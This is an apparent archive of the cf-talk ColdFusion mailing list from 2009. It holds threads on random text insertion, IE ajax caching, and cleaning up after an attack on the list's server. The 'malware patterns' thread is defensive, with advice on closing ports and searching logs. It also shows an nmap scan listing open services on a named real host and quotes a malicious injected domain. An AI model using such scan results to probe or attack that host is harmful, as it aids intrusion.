Re: Putting a random phrase after a sentence.
Thanks. I'll test it out and let you know how it goes. :) On Thu, Sep 17, 2009 at 10:35 PM, Barney Boisvert wrote: > > 100% untested, but you get the idea: > > s = "The project is done."; > strings = [ > "and dinna spare the whip", > "and I sure am handsome", > ... > ] > start = 0; > while (true) { > // any . ? ! preceded by a letter and followed by a space > start = REFind("[a-zA-Z][.?!]( |$)", s, start); > if (start == 0) { > break; // no match > } > if (randRange(1, 20) EQ 1) { // 5% chance > rs = strings[randRange(1, arrayLen(strings))]; > insert(", " & rs, s, start + 1); > start += len(rs) + 4; > } > } > > On Thu, Sep 17, 2009 at 10:15 PM, Phillip Vector > wrote: >> >> Hey people. I'm working on a filter to put in some random text into my >> pages. For example... >> >> The project is done. >> >> Becomes >> >> The project is done, and dinna spare the whip! >> >> (I think some of you know why I am doing this). :) >> >> Anyway, I don't want to have it appear after EVERY period or ! or ?.. >> I'd like to randomly put it (say, 5% chance every sentence). >> >> I'm thinking about looping over the text, character by character. When >> it finds a period, it "rolls the dice" and perhaps does the >> replacement based on the last few characters before the period. Then >> keeps going. >> >> Does anyone have a less convoulted way of doing this (or something I >> can plug and play into it)? >> >> > > ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326421 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Putting a random phrase after a sentence.
100% untested, but you get the idea: s = "The project is done."; strings = [ "and dinna spare the whip", "and I sure am handsome", ... ] start = 0; while (true) { // any . ? ! preceded by a letter and followed by a space start = REFind("[a-zA-Z][.?!]( |$)", s, start); if (start == 0) { break; // no match } if (randRange(1, 20) EQ 1) { // 5% chance rs = strings[randRange(1, arrayLen(strings))]; insert(", " & rs, s, start + 1); start += len(rs) + 4; } } On Thu, Sep 17, 2009 at 10:15 PM, Phillip Vector wrote: > > Hey people. I'm working on a filter to put in some random text into my > pages. For example... > > The project is done. > > Becomes > > The project is done, and dinna spare the whip! > > (I think some of you know why I am doing this). :) > > Anyway, I don't want to have it appear after EVERY period or ! or ?.. > I'd like to randomly put it (say, 5% chance every sentence). > > I'm thinking about looping over the text, character by character. When > it finds a period, it "rolls the dice" and perhaps does the > replacement based on the last few characters before the period. Then > keeps going. > > Does anyone have a less convoulted way of doing this (or something I > can plug and play into it)? > > ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326420 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Putting a random phrase after a sentence.
Hey people. I'm working on a filter to put in some random text into my pages. For example... The project is done. Becomes The project is done, and dinna spare the whip! (I think some of you know why I am doing this). :) Anyway, I don't want to have it appear after EVERY period or ! or ?.. I'd like to randomly put it (say, 5% chance every sentence). I'm thinking about looping over the text, character by character. When it finds a period, it "rolls the dice" and perhaps does the replacement based on the last few characters before the period. Then keeps going. Does anyone have a less convoulted way of doing this (or something I can plug and play into it)? ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326419 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: malware patterns
> Could they have been opened by a virus? Well, I don't think it would be a virus in the traditional sense, no. But if you have access to the filesystem with SYSTEM or admin rights, you can do anything you want really. > I've checked the whole system and if there was any Hentai on it, I'd know. Really? Don't be so sure! http://technet.microsoft.com/en-us/sysinternals/bb897440.aspx Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326418 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: malware patterns
oops, should have been off-list. Sorry! On Thu, Sep 17, 2009 at 17:55, Dave Watts wrote: >>> Fast question. On win2k is there an easy way of closing/blocking these >>> or does it have to be further up the chain. >> >> Yes. You can do this with an IP security policy. However, I would also >> recommend that you block all unwanted traffic at the gateway, of >> course. > > If you like, I can probably send you a canned .ipsec file offlist > which you can apply without having to learn the awful IP security > policy interface. > > Frankly, I'm surprised you haven't had other problems, with SMB/CIFS > exposed to the public. You may want to make sure you're not hosting > any tentacle porn, etc. It wouldn't have to be web accessible, either, > so you should probably check, well, everything. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326417 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: malware patterns
Could they have been opened by a virus? I've checked the whole system and if there was any Hentai on it, I'd know. > Frankly, I'm surprised you haven't had other problems, with SMB/CIFS > exposed to the public. You may want to make sure you're not hosting > any tentacle porn, etc. It wouldn't have to be web accessible, either, > so you should probably check, well, everything. > > Dave Watts, CTO, Fig Leaf Software > http://www.figleaf.com/ > > Fig Leaf Software provides the highest caliber vendor-authorized > instruction at our training centers in Washington DC, Atlanta, > Chicago, Baltimore, Northern Virginia, or on-site at your location. > Visit http://training.figleaf.com/ for more information! > > ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326416 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: malware patterns
>> Fast question. On win2k is there an easy way of closing/blocking these >> or does it have to be further up the chain. > > Yes. You can do this with an IP security policy. However, I would also > recommend that you block all unwanted traffic at the gateway, of > course. If you like, I can probably send you a canned .ipsec file offlist which you can apply without having to learn the awful IP security policy interface. Frankly, I'm surprised you haven't had other problems, with SMB/CIFS exposed to the public. You may want to make sure you're not hosting any tentacle porn, etc. It wouldn't have to be web accessible, either, so you should probably check, well, everything. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326415 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: malware patterns
> Fast question. On win2k is there an easy way of closing/blocking these > or does it have to be further up the chain. Yes. You can do this with an IP security policy. However, I would also recommend that you block all unwanted traffic at the gateway, of course. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326414 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: malware patterns
IPSec... that could get a little complicated. A firewall should be able to block this, as well as adding ACLs to the router. -Original Message- From: Michael Dinowitz [mailto:mdino...@houseoffusion.com] Sent: Thursday, September 17, 2009 1:42 PM To: cf-talk Subject: Re: malware patterns Fast question. On win2k is there an easy way of closing/blocking these or does it have to be further up the chain. On Thu, Sep 17, 2009 at 4:33 PM, Jacob wrote: > > 135 and 445 should NOT be open to the public! > > -Original Message- > From: b...@bradwood.com [mailto:b...@bradwood.com] > Sent: Thursday, September 17, 2009 12:47 PM > To: cf-talk > Subject: RE: malware patterns > > > Michael, a quick nMap shows the following ports are open on the server > that houseoffusion.com resolves to (64.118.74.245). > > PORT STATE SERVICE > 21/tcp open ftp > 80/tcp open http > 135/tcp open msrpc > 443/tcp open https > 445/tcp open microsoft-ds > 1025/tcp open NFS-or-IIS > 1036/tcp open unknown > 1041/tcp open unknown > 2522/tcp open unknown > 3389/tcp open ms-term-serv > 7999/tcp open unknown > > Have you accounted for each program that is listening on these ports and > can any of them closed that aren't needed? You've got terminal services > in there as well as Directory Services. I would audit the passwords on > all the windows accounts since they are the only thing keeping someone > from using these ports. > > Also, did you ever find anything in your Windows logs? Security under > Event Viewer should show you all authentication that happened prior to > the attack. > > Also, on the complete random off-chance that your vulnerability was > through a CFML file that got uploaded, taking a peek at your class files > (which would be no small task) might reveal any compiled crumbs left > behind by a rouge .cfm file that deleted itself after execution. > > If you are on SQL Server 2005, I have been able to get the SQL of > recently run queries by looking in the cached execution plans. > SELECT cached.*, > sqltext.* > FROM sys.dm_exec_cached_plans cached > CROSS APPLY sys.dm_exec_sql_text (cached.plan_handle) AS sqltext > > I know those are long shots, but the sooner you look, the more you might > be able to uncover before the tracks slowly get covered. > > I do hope you are able to find the cause for the benefit of us all. > > ~Brad > > > > Original Message > Subject: malware patterns > From: Michael Dinowitz > Date: Thu, September 17, 2009 2:08 pm > To: cf-talk > > > The recent attack on House of Fusion resulted in some useful > information as to what you should look for. In general, all or most of > the files with the following extensions were affected: > > > > > > ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326413 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: How to prevent IE from caching content added via ajax?
Good to know, Josh! Thanks! -Original Message- From: Josh Nathanson [mailto:p...@oakcitygraphics.com] Sent: Thursday, September 17, 2009 5:03 PM To: cf-talk Subject: RE: How to prevent IE from caching content added via ajax? Oh...if you are using the load function, then you can just do this somewhere before it: $.ajaxSetup({ cache: false }); This will make it so any and all subsequent ajax requests (including load) are not cached. -- Josh -Original Message- From: Josh Nathanson [mailto:p...@oakcitygraphics.com] Sent: Thursday, September 17, 2009 1:49 PM To: cf-talk Subject: RE: How to prevent IE from caching content added via ajax? Did you set cache: false in your $.ajax params? -- Josh -Original Message- From: Rick Faircloth [mailto:r...@whitestonemedia.com] Sent: Thursday, September 17, 2009 1:42 PM To: cf-talk Subject: How to prevent IE from caching content added via ajax? Poor title, but I couldn't get it all in there. - got a page which loads a .cfm of content into a div via a jQuery .load function - the content for the .loaded .cfm page is generated in a cfc method, and I use cfsavecontent and save the generated content out to the aforementioned .cfm file - when the page I'm loading in the browser loads the content via .load from the .cfm page, IE doesn't refresh the .loaded content.FF does - If I close IE and open the page again, the content is refreshed.even refreshing the page using F5 doesn't help - I've tried the mega tags and as well as the header - None of those headers or meta tags are working - what else could I try? Thanks for any suggestions! Rick --- "Those who hammer their guns into plows will plow for those who do not." - Thomas Jefferson ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326412 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: How to prevent IE from caching content added via ajax?
Thanks, Tony! -Original Message- From: Tony Bentley [mailto:t...@tonybentley.com] Sent: Thursday, September 17, 2009 4:45 PM To: cf-talk Subject: Re: How to prevent IE from caching content added via ajax? If you are loading via url: function ts(){ var tr = ''; var curDateTime = new Date() tr += curDateTime.getHours(); tr += curDateTime.getMinutes(); tr += curDateTime.getSeconds(); return tr; } $("#myloaddiv").load(/ajaxDIV/index.cfm?id="+id+"&ts="+ts(); Otherwise, for an http post you just need to pass it as a parameter. ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326411 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: How to prevent IE from caching content added via ajax?
Yep...that's the first thing in the $.ajax settings... But, I believe I've solved the problem. Usually when I use .load to add content in a .cfm file into a div, I use this: $('#hiddenResult').load('../components/propertiesDisplay.cfm?' + new Date().getTime()); I had one other place in my code (pagination code) that involved loading that same page, but I didn't have the ' + new Date().getTime(); query string on the end. Once I added that again in this place and changed the content, IE loaded it fine. Thanks for the tip, Josh! Rick -Original Message- From: Josh Nathanson [mailto:p...@oakcitygraphics.com] Sent: Thursday, September 17, 2009 4:49 PM To: cf-talk Subject: RE: How to prevent IE from caching content added via ajax? Did you set cache: false in your $.ajax params? -- Josh -Original Message- From: Rick Faircloth [mailto:r...@whitestonemedia.com] Sent: Thursday, September 17, 2009 1:42 PM To: cf-talk Subject: How to prevent IE from caching content added via ajax? Poor title, but I couldn't get it all in there. - got a page which loads a .cfm of content into a div via a jQuery .load function - the content for the .loaded .cfm page is generated in a cfc method, and I use cfsavecontent and save the generated content out to the aforementioned .cfm file - when the page I'm loading in the browser loads the content via .load from the .cfm page, IE doesn't refresh the .loaded content.FF does - If I close IE and open the page again, the content is refreshed.even refreshing the page using F5 doesn't help - I've tried the mega tags and as well as the header - None of those headers or meta tags are working - what else could I try? Thanks for any suggestions! Rick --- "Those who hammer their guns into plows will plow for those who do not." - Thomas Jefferson ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326410 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: How to prevent IE from caching content added via ajax?
Oh...if you are using the load function, then you can just do this somewhere before it: $.ajaxSetup({ cache: false }); This will make it so any and all subsequent ajax requests (including load) are not cached. -- Josh -Original Message- From: Josh Nathanson [mailto:p...@oakcitygraphics.com] Sent: Thursday, September 17, 2009 1:49 PM To: cf-talk Subject: RE: How to prevent IE from caching content added via ajax? Did you set cache: false in your $.ajax params? -- Josh -Original Message- From: Rick Faircloth [mailto:r...@whitestonemedia.com] Sent: Thursday, September 17, 2009 1:42 PM To: cf-talk Subject: How to prevent IE from caching content added via ajax? Poor title, but I couldn't get it all in there. - got a page which loads a .cfm of content into a div via a jQuery .load function - the content for the .loaded .cfm page is generated in a cfc method, and I use cfsavecontent and save the generated content out to the aforementioned .cfm file - when the page I'm loading in the browser loads the content via .load from the .cfm page, IE doesn't refresh the .loaded content.FF does - If I close IE and open the page again, the content is refreshed.even refreshing the page using F5 doesn't help - I've tried the mega tags and as well as the header - None of those headers or meta tags are working - what else could I try? Thanks for any suggestions! Rick --- "Those who hammer their guns into plows will plow for those who do not." - Thomas Jefferson ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326409 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: malware patterns
Fast note. Some anti-virus programs are reporting this thread as having a virus due to the code fragment from the first post. This is a false positive, but if there is a concern, just use the website interface. ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326408 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: malware patterns
>>http://bgadf.cn> Arg... chinese junk again :-( ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326407 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: How to prevent IE from caching content added via ajax?
If you are loading via url: function ts(){ var tr = ''; var curDateTime = new Date() tr += curDateTime.getHours(); tr += curDateTime.getMinutes(); tr += curDateTime.getSeconds(); return tr; } $("#myloaddiv").load(/ajaxDIV/index.cfm?id="+id+"&ts="+ts(); Otherwise, for an http post you just need to pass it as a parameter. ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326406 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: How to prevent IE from caching content added via ajax?
Did you set cache: false in your $.ajax params? -- Josh -Original Message- From: Rick Faircloth [mailto:r...@whitestonemedia.com] Sent: Thursday, September 17, 2009 1:42 PM To: cf-talk Subject: How to prevent IE from caching content added via ajax? Poor title, but I couldn't get it all in there. - got a page which loads a .cfm of content into a div via a jQuery .load function - the content for the .loaded .cfm page is generated in a cfc method, and I use cfsavecontent and save the generated content out to the aforementioned .cfm file - when the page I'm loading in the browser loads the content via .load from the .cfm page, IE doesn't refresh the .loaded content.FF does - If I close IE and open the page again, the content is refreshed.even refreshing the page using F5 doesn't help - I've tried the mega tags and as well as the header - None of those headers or meta tags are working - what else could I try? Thanks for any suggestions! Rick --- "Those who hammer their guns into plows will plow for those who do not." - Thomas Jefferson ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326405 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: malware patterns
Didn't mean to hit send... Here is a tech article on doing at the server level http://support.microsoft.com/kb/813878 On Thu, Sep 17, 2009 at 1:46 PM, Alan Rother wrote: > I would block them at the Firewall. You don't even want the traffic getting > to the box. > =] > > > On Thu, Sep 17, 2009 at 1:42 PM, Michael Dinowitz < > mdino...@houseoffusion.com> wrote: > >> >> Fast question. On win2k is there an easy way of closing/blocking these >> or does it have to be further up the chain. >> >> On Thu, Sep 17, 2009 at 4:33 PM, Jacob wrote: >> > >> > 135 and 445 should NOT be open to the public! >> > >> > -Original Message- >> > From: b...@bradwood.com [mailto:b...@bradwood.com] >> > Sent: Thursday, September 17, 2009 12:47 PM >> > To: cf-talk >> > Subject: RE: malware patterns >> > >> > >> > Michael, a quick nMap shows the following ports are open on the server >> > that houseoffusion.com resolves to (64.118.74.245). >> > >> > PORT STATE SERVICE >> > 21/tcp open ftp >> > 80/tcp open http >> > 135/tcp open msrpc >> > 443/tcp open https >> > 445/tcp open microsoft-ds >> > 1025/tcp open NFS-or-IIS >> > 1036/tcp open unknown >> > 1041/tcp open unknown >> > 2522/tcp open unknown >> > 3389/tcp open ms-term-serv >> > 7999/tcp open unknown >> > >> > Have you accounted for each program that is listening on these ports and >> > can any of them closed that aren't needed? You've got terminal services >> > in there as well as Directory Services. I would audit the passwords on >> > all the windows accounts since they are the only thing keeping someone >> > from using these ports. >> > >> > Also, did you ever find anything in your Windows logs? Security under >> > Event Viewer should show you all authentication that happened prior to >> > the attack. >> > >> > Also, on the complete random off-chance that your vulnerability was >> > through a CFML file that got uploaded, taking a peek at your class files >> > (which would be no small task) might reveal any compiled crumbs left >> > behind by a rouge .cfm file that deleted itself after execution. >> > >> > If you are on SQL Server 2005, I have been able to get the SQL of >> > recently run queries by looking in the cached execution plans. >> > SELECT cached.*, >> >sqltext.* >> > FROM sys.dm_exec_cached_plans cached >> > CROSS APPLY sys.dm_exec_sql_text (cached.plan_handle) AS sqltext >> > >> > I know those are long shots, but the sooner you look, the more you might >> > be able to uncover before the tracks slowly get covered. >> > >> > I do hope you are able to find the cause for the benefit of us all. >> > >> > ~Brad >> > >> > >> > >> > Original Message >> > Subject: malware patterns >> > From: Michael Dinowitz >> > Date: Thu, September 17, 2009 2:08 pm >> > To: cf-talk >> > >> > >> > The recent attack on House of Fusion resulted in some useful >> > information as to what you should look for. In general, all or most of >> > the files with the following extensions were affected: >> > >> > >> > >> > >> > >> > >> >> ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326404 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: malware patterns
You can turn off windows file and print sharing or enable the Windows firewall, but chances are you want those ports available to your internal network. Assuming this machine is behind a hardware firewall, that is the best place to lock down ports you don't want the outside world getting to. Or worst case, limit the outside IP addresses that have access to them. Chances are, the only ports that really need to be publicly accessible on a web server are 80 and possibly 443. ~Brad Original Message Subject: Re: malware patterns From: Michael Dinowitz Date: Thu, September 17, 2009 3:42 pm To: cf-talk Fast question. On win2k is there an easy way of closing/blocking these or does it have to be further up the chain. ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326403 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: malware patterns
I would block them at the Firewall. You don't even want the traffic getting to the box. =] On Thu, Sep 17, 2009 at 1:42 PM, Michael Dinowitz < mdino...@houseoffusion.com> wrote: > > Fast question. On win2k is there an easy way of closing/blocking these > or does it have to be further up the chain. > > On Thu, Sep 17, 2009 at 4:33 PM, Jacob wrote: > > > > 135 and 445 should NOT be open to the public! > > > > -Original Message- > > From: b...@bradwood.com [mailto:b...@bradwood.com] > > Sent: Thursday, September 17, 2009 12:47 PM > > To: cf-talk > > Subject: RE: malware patterns > > > > > > Michael, a quick nMap shows the following ports are open on the server > > that houseoffusion.com resolves to (64.118.74.245). > > > > PORT STATE SERVICE > > 21/tcp open ftp > > 80/tcp open http > > 135/tcp open msrpc > > 443/tcp open https > > 445/tcp open microsoft-ds > > 1025/tcp open NFS-or-IIS > > 1036/tcp open unknown > > 1041/tcp open unknown > > 2522/tcp open unknown > > 3389/tcp open ms-term-serv > > 7999/tcp open unknown > > > > Have you accounted for each program that is listening on these ports and > > can any of them closed that aren't needed? You've got terminal services > > in there as well as Directory Services. I would audit the passwords on > > all the windows accounts since they are the only thing keeping someone > > from using these ports. > > > > Also, did you ever find anything in your Windows logs? Security under > > Event Viewer should show you all authentication that happened prior to > > the attack. > > > > Also, on the complete random off-chance that your vulnerability was > > through a CFML file that got uploaded, taking a peek at your class files > > (which would be no small task) might reveal any compiled crumbs left > > behind by a rouge .cfm file that deleted itself after execution. > > > > If you are on SQL Server 2005, I have been able to get the SQL of > > recently run queries by looking in the cached execution plans. > > SELECT cached.*, > >sqltext.* > > FROM sys.dm_exec_cached_plans cached > > CROSS APPLY sys.dm_exec_sql_text (cached.plan_handle) AS sqltext > > > > I know those are long shots, but the sooner you look, the more you might > > be able to uncover before the tracks slowly get covered. > > > > I do hope you are able to find the cause for the benefit of us all. > > > > ~Brad > > > > > > > > Original Message > > Subject: malware patterns > > From: Michael Dinowitz > > Date: Thu, September 17, 2009 2:08 pm > > To: cf-talk > > > > > > The recent attack on House of Fusion resulted in some useful > > information as to what you should look for. In general, all or most of > > the files with the following extensions were affected: > > > > > > > > > > > > > > ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326402 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
How to prevent IE from caching content added via ajax?
Poor title, but I couldn't get it all in there. - got a page which loads a .cfm of content into a div via a jQuery .load function - the content for the .loaded .cfm page is generated in a cfc method, and I use cfsavecontent and save the generated content out to the aforementioned .cfm file - when the page I'm loading in the browser loads the content via .load from the .cfm page, IE doesn't refresh the .loaded content.FF does - If I close IE and open the page again, the content is refreshed.even refreshing the page using F5 doesn't help - I've tried the mega tags and as well as the header - None of those headers or meta tags are working - what else could I try? Thanks for any suggestions! Rick --- "Those who hammer their guns into plows will plow for those who do not." - Thomas Jefferson ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326401 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: malware patterns
Fast question. On win2k is there an easy way of closing/blocking these or does it have to be further up the chain. On Thu, Sep 17, 2009 at 4:33 PM, Jacob wrote: > > 135 and 445 should NOT be open to the public! > > -Original Message- > From: b...@bradwood.com [mailto:b...@bradwood.com] > Sent: Thursday, September 17, 2009 12:47 PM > To: cf-talk > Subject: RE: malware patterns > > > Michael, a quick nMap shows the following ports are open on the server > that houseoffusion.com resolves to (64.118.74.245). > > PORT STATE SERVICE > 21/tcp open ftp > 80/tcp open http > 135/tcp open msrpc > 443/tcp open https > 445/tcp open microsoft-ds > 1025/tcp open NFS-or-IIS > 1036/tcp open unknown > 1041/tcp open unknown > 2522/tcp open unknown > 3389/tcp open ms-term-serv > 7999/tcp open unknown > > Have you accounted for each program that is listening on these ports and > can any of them closed that aren't needed? You've got terminal services > in there as well as Directory Services. I would audit the passwords on > all the windows accounts since they are the only thing keeping someone > from using these ports. > > Also, did you ever find anything in your Windows logs? Security under > Event Viewer should show you all authentication that happened prior to > the attack. > > Also, on the complete random off-chance that your vulnerability was > through a CFML file that got uploaded, taking a peek at your class files > (which would be no small task) might reveal any compiled crumbs left > behind by a rouge .cfm file that deleted itself after execution. > > If you are on SQL Server 2005, I have been able to get the SQL of > recently run queries by looking in the cached execution plans. > SELECT cached.*, > sqltext.* > FROM sys.dm_exec_cached_plans cached > CROSS APPLY sys.dm_exec_sql_text (cached.plan_handle) AS sqltext > > I know those are long shots, but the sooner you look, the more you might > be able to uncover before the tracks slowly get covered. > > I do hope you are able to find the cause for the benefit of us all. > > ~Brad > > > > Original Message > Subject: malware patterns > From: Michael Dinowitz > Date: Thu, September 17, 2009 2:08 pm > To: cf-talk > > > The recent attack on House of Fusion resulted in some useful > information as to what you should look for. In general, all or most of > the files with the following extensions were affected: > > > > > > ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326400 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: malware patterns
135 and 445 should NOT be open to the public! -Original Message- From: b...@bradwood.com [mailto:b...@bradwood.com] Sent: Thursday, September 17, 2009 12:47 PM To: cf-talk Subject: RE: malware patterns Michael, a quick nMap shows the following ports are open on the server that houseoffusion.com resolves to (64.118.74.245). PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1036/tcp open unknown 1041/tcp open unknown 2522/tcp open unknown 3389/tcp open ms-term-serv 7999/tcp open unknown Have you accounted for each program that is listening on these ports and can any of them closed that aren't needed? You've got terminal services in there as well as Directory Services. I would audit the passwords on all the windows accounts since they are the only thing keeping someone from using these ports. Also, did you ever find anything in your Windows logs? Security under Event Viewer should show you all authentication that happened prior to the attack. Also, on the complete random off-chance that your vulnerability was through a CFML file that got uploaded, taking a peek at your class files (which would be no small task) might reveal any compiled crumbs left behind by a rouge .cfm file that deleted itself after execution. If you are on SQL Server 2005, I have been able to get the SQL of recently run queries by looking in the cached execution plans. SELECT cached.*, sqltext.* FROM sys.dm_exec_cached_plans cached CROSS APPLY sys.dm_exec_sql_text (cached.plan_handle) AS sqltext I know those are long shots, but the sooner you look, the more you might be able to uncover before the tracks slowly get covered. I do hope you are able to find the cause for the benefit of us all. ~Brad Original Message Subject: malware patterns From: Michael Dinowitz Date: Thu, September 17, 2009 2:08 pm To: cf-talk The recent attack on House of Fusion resulted in some useful information as to what you should look for. In general, all or most of the files with the following extensions were affected: ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326399 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: malware patterns
